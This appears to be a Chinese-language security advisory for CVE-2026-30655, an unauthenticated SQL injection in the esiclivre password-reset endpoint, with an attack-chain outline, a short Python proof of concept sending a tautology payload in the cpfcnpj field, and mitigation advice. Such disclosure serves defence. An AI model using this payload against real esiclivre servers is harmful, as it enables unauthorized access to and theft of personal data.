CVE-2026-30655 CVSS 6.5 中危

CVE-2026-30655 esiclivre SQL注入漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30655

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

esiclivre/esiclivre

漏洞概述

esiclivre开源项目在0.2.2及更早版本中存在SQL注入安全漏洞。该漏洞位于Solicitante::resetaSenha()方法，由于未对用户输入的cpfcnpj参数进行严格的过滤和校验，导致攻击者可注入恶意SQL语句。未经身份认证的远程攻击者可利用此漏洞绕过安全限制，获取数据库中的敏感信息，造成数据泄露风险。

技术细节

该漏洞的核心在于esiclivre系统中处理密码重置功能的代码逻辑缺陷。具体来说，`Solicitante::resetaSenha()`方法直接接收通过`/reset/index.php`接口提交的`cpfcnpj`参数，并将其拼接到SQL查询语句中，未使用参数化查询或有效的输入过滤机制。攻击者无需经过身份认证（PR:N）即可构造包含SQL元字符（如单引号、注释符）的恶意请求发送至服务器。一旦服务器执行该恶意SQL语句，攻击者即可利用基于错误的注入、布尔盲注或联合查询技术，从后端数据库中提取敏感数据，如用户个人信息、凭证哈希等，从而实现未授权的信息访问。

攻击链分析

STEP 1

1. 信息侦察

攻击者识别出目标服务器上运行的是esiclivre系统，且版本号小于等于0.2.2。

STEP 2

2. 构造Payload

攻击者针对`cpfcnpj`参数构造SQL注入Payload，例如使用 `' OR 1=1-- -` 来测试或利用漏洞。

STEP 3

3. 发送恶意请求

攻击者向`/reset/index.php`端点发送未经身份认证的HTTP POST/GET请求，携带恶意参数。

STEP 4

4. 执行注入

服务器后端`Solicitante::resetaSenha()`方法接收参数并直接拼接到SQL语句执行，导致数据库逻辑被篡改。

STEP 5

5. 数据窃取

攻击者根据数据库返回的错误信息或页面内容差异，解析出敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
target_url = "http://localhost/reset/index.php"

# Malicious payload for SQL injection
# This payload attempts to bypass logic or extract data
payload = {
    "cpfcnpj": "' OR '1'='1'-- -"
}

try:
    # Sending POST request to the vulnerable endpoint
    response = requests.post(target_url, data=payload)
    
    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response snippet:")
        print(response.text[:500])  # Print first 500 chars of response
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

esiclivre/esiclivre <= 0.2.2

防御指南

临时缓解措施

建议立即在Web应用防火墙（WAF）中添加针对`/reset/index.php`接口的SQL注入防护规则。在代码层面，临时修复方案是对`cpfcnpj`参数进行强制类型转换或正则匹配（确保符合CPF/CNPJ格式），并过滤单引号等特殊字符，直到官方补丁发布并部署。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30655
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30655
3 Details https://www.cvedetails.com/cve/CVE-2026-30655/
4 VulDB https://vuldb.com/cve/CVE-2026-30655
5 Link https://github.com/brynax/CVE-2026-30655
6 Link https://github.com/esiclivre/esiclivre

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表